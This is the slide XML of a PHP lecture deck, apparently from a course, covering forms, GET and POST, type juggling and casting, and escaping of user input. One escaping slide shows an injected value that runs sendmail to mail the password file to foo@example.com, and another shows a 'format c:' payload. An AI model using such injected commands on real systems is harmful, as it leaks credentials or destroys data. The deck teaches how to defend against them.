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394" r:id="rId3"/>
    <p:sldId id="395" r:id="rId4"/>
    <p:sldId id="436" r:id="rId5"/>
    <p:sldId id="437" r:id="rId6"/>
    <p:sldId id="438" r:id="rId7"/>
    <p:sldId id="439" r:id="rId8"/>
    <p:sldId id="440" r:id="rId9"/>
    <p:sldId id="441" r:id="rId10"/>
    <p:sldId id="435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67" r:id="rId23"/>
    <p:sldId id="454" r:id="rId24"/>
    <p:sldId id="468" r:id="rId25"/>
    <p:sldId id="456" r:id="rId26"/>
    <p:sldId id="457" r:id="rId27"/>
    <p:sldId id="458" r:id="rId28"/>
    <p:sldId id="459" r:id="rId29"/>
    <p:sldId id="460" r:id="rId30"/>
    <p:sldId id="461" r:id="rId31"/>
    <p:sldId id="470" r:id="rId32"/>
    <p:sldId id="471" r:id="rId33"/>
    <p:sldId id="472" r:id="rId34"/>
    <p:sldId id="466" r:id="rId35"/>
    <p:sldId id="463" r:id="rId36"/>
    <p:sldId id="469" r:id="rId37"/>
    <p:sldId id="465" r:id="rId38"/>
    <p:sldId id="421" r:id="rId39"/>
    <p:sldId id="422" r:id="rId40"/>
    <p:sldId id="352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5C0E"/>
    <a:srgbClr val="F9F0AB"/>
    <a:srgbClr val="F9E6AB"/>
    <a:srgbClr val="F9FAAB"/>
    <a:srgbClr val="767691"/>
    <a:srgbClr val="7676AA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32" y="-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6/27/2014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32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3792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03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79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2473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5447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809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24888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2224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9118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10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Working with User Input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 Forms, GET, POST,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Query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GET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51121"/>
            <a:ext cx="10896600" cy="51563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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>also an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>associative array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>If we open the URL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next.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>script will start with built-in array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$_GET['page'] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>will be 1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$_GET['user'] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>will be "john"</a:t>
            </a:r>
          </a:p>
          <a:p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438400"/>
            <a:ext cx="10591800" cy="5689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http://phpcourse.com/next.php?page=1&amp;user=john</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="181858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GET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8012" y="3060094"/>
            <a:ext cx="3448782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25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$_POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>VS $_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GET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5156368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sz="2800" dirty="0"/>
              <a:t>The get requests passes the parameters trough the URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Allows a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>user to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>send a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>link or bookmark the page as it is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URL is limited to 255 symbols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The post request passes the parameters trough the request body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User cannot open the page without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>filling in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>post data in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>form </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>first</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Allows sending files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Unlimited size of data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xmlns="" val="379005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Request Type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2" y="1151121"/>
            <a:ext cx="9388546" cy="515636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$_SERVER['REQUEST_METHOD'] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Vani" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>holds the name of the request type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Vani" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can be one of '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 smtClean="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Vani" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>', '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2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Vani" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>', '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2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Vani" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>', '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sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Vani" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Vani" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Can be used to detect if user has submitted data or just opens the page from URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Calibri (Body)"/>
                <a:cs typeface="Vani" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Case sensitive!</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="2400" dirty="0">
              <a:latin typeface="Calibri (Body)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35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Form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4012" y="1143000"/>
            <a:ext cx="6248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039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Escaping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6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User Input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1676400"/>
            <a:ext cx="10521223" cy="4191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latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>Parsing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>the input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>so that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>it does not contain symbols or sets of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>characters that could cause malfunction of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>the code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 (Body)"/>
              </a:rPr>
              <a:t>Very important when the data is sent to database or system processes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 (Body)"/>
              </a:rPr>
              <a:t>Lack of escaping may lead to security issues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 (Body)"/>
              </a:rPr>
              <a:t>Usually necessary only for string-data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>PHP is type-less language so all input should be checked!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>PHP input is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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>and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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>arrays</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG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63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User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Input{2}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102" y="1447800"/>
            <a:ext cx="11804822" cy="515636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latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>First step - making sure the input is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>right type	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Calibri (Body)"/>
              </a:rPr>
              <a:t>PHP has several functions for type conversions and detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pP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is_int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>, </a:t>
            </a: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is_double</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>, </a:t>
            </a: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is_numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t>, </a:t>
            </a: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is_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Calibri (Body)"/>
              </a:rPr>
              <a:t> and other functions return true if variable is of the specified  type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3581400"/>
            <a:ext cx="10591800" cy="109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(1); // true</a:t>
            </a:r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('a'); // false</a:t>
            </a:r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('1'); //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62085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Escaping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1212" y="3276600"/>
            <a:ext cx="4570413" cy="25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809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Juggling</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0" smtClean="0"/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We can read the variables in the necessary type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pP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600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a: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floatval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a: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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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strval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> return the variable in the respective type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pP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also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>supports an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>optional second parameter for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the base </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>of conversion</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="24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6924" y="2408780"/>
            <a:ext cx="10591800" cy="1680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(42); //42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(4.2); // 4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('042'); // 42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(true); // 1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49.99 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="bg-BG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лв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49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6924" y="5410200"/>
            <a:ext cx="10591800" cy="80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(42, 8); // 42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('42', 8); // 34</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="11450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HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" dirty="0" smtClean="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Handling User Input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GET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>VS POST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err="1"/>
              <a:t>cURL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Magic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Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>user data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Query Strings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Files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2779" y="29718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7868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Juggling (2)</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" smtClean="0"/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settype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converts a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>variable to specified type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Types can be: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(or </a:t>
            </a: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 smtClean="0"/>
              <a:t>), integer (or </a:t>
            </a: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/>
              <a:t>), float (or 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dirty="0" smtClean="0"/>
              <a:t>), string, array, object, null</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="24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6924" y="3124200"/>
            <a:ext cx="10591800" cy="1387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$foo = "5 bottles of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rakia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$bar = true;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($foo,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 // $foo becomes 5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($bar, 'string'); //$bar becomes '1'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="203773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Types Juggling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9012" y="3352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821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Casting</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" smtClean="0"/>
          </a:p>
        </p:txBody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/>
              <a:t>Type casting is changing the type of variable only for current operation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Syntax is – add the necessary type in brackets before the variable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Sometimes PHP does implicit casting</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG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2438400"/>
            <a:ext cx="10591800" cy="109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$foo = true;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)$foo; // prints 1, $foo doesn’t change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(string)FALSE; // prints nothing…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4433744"/>
            <a:ext cx="10591800" cy="13915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$foo = 0 + "123"; // $foo is integer 123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$foo = 0 + "123.4"; // $foo is float 123.4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$bar = "$foo";	// $bar is string '123.4'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$foo = "123" + 0; // $foo is string 1230</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="336931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Types Casting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xmlns="" val="66402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Escaping Strings</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" smtClean="0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Strings must be escaped with extra caution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Quotes, semicolons, Unicode symbols and others may break the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>For instance – quote in a string that is passed on to SQL query may cause the server to execute malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Most issues are when building string from input data that is passed on to other processes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531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Escaping User Input</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" smtClean="0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Example</a:t>
            </a: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endParaRPr lang="en-US" sz="28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What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$_POST['user']</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> contains:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pP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So the command executed becomes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pP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600" dirty="0"/>
              <a:t>And at address foo@example.com is sent the entire password file </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="bg-BG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6274" y="1679621"/>
            <a:ext cx="10591800" cy="80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/users/".$_POST['user'];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 ($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executes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shell command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012" y="3134003"/>
            <a:ext cx="10591800" cy="514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dimitar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sendmail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foo@example.com &lt; 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35179" y="4343400"/>
            <a:ext cx="10591800" cy="514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/users/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dimitar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foo@example.com &lt; /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1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User Input {2}</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody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several characters to be careful for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Quotes or double quotes – string ending (beginning)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Semicolons, pipe operators (|&lt;&gt;) – shell operators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Depending on the purpose there may be more and the escaping may differ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Usually you have to place backslash (\) in front of them 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2146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User Input {3}</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0" smtClean="0"/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212" y="1153996"/>
            <a:ext cx="11251399" cy="54864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addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> – escapes all special symbols in a string (quote, double quote, backslash)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pP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addcslashes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– escapes given list of characters in a string</a:t>
            </a:r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 lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Will place backslash in front of all the listed symbols - ; | &lt; &gt; ' "</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Be careful to escape the symbols in the list if necessary</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="2400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4011" y="2743200"/>
            <a:ext cx="10591800" cy="514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addcslashes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dimitar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format c:", ';|&lt;&gt;\'"');</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="380521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User Input {4}</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" dirty="0" smtClean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1066800"/>
            <a:ext cx="11201400" cy="56388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800" dirty="0" smtClean="0"/>
              <a:t>There are several other functions for escaping that are useful in variety of cases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quotemeta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– escapes the symbols </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>. \ + * ? [ ^ ] ( $ )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– convert HTML special characters to entities: &amp;, ", ', &lt; and &gt; become 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&amp;amp; &amp;quote; &amp;#039; &amp;</a:t>
            </a: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1257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PHP Automatic Escaping Engine</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="3600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/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>supports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>magic_quotes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> engine that escapes all necessary characters in the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$_COOKIE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>array automatically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In versions before 5.2 it is turned on by default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Considered dangerous approach and thus – deprecated. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E85C0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 NOT USE IT!!! </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="E85C0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ts val="36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developers should handle escaping manually with the supplied functions</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="26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40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HTML Forms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2049" y="3048000"/>
            <a:ext cx="252679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345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1663" y="2702231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Query Strings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381905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Query String</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="3600" dirty="0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 smtClean="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>sent to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ppended </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>to the end of a page URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>are the benefits of using query string for state management: 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• No server resources are required. The query string containing in the HTTP requests for a specific URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPts val="3600"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>• All browsers support query strings.</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG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91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Build Query String</a:t>
            </a:r>
            <a:endParaRPr lang="bg-BG" sz="3600" dirty="0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84" y="1151121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http_build_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="28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>
                <a:solidFill>
                  <a:srgbClr val="FFC000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alibri (Body)"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000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sz="2800" dirty="0"/>
              <a:t>Generates a URL-encoded query string from the associative (or indexed) array provided. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800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2402686"/>
            <a:ext cx="10591800" cy="3141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$data = array('foo'=&gt;'bar',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'=&gt;'boom',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'cow'=&gt;'milk',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'=&gt;'hypertext processor');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc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http_build_query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($data) . "\n";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http_build_query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($data, '', '&amp;amp;');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc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978837" y="2096362"/>
            <a:ext cx="9332998" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1572"/>
              <a:gd name="adj2" fmla="val 209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foo=</a:t>
            </a:r>
            <a:r>
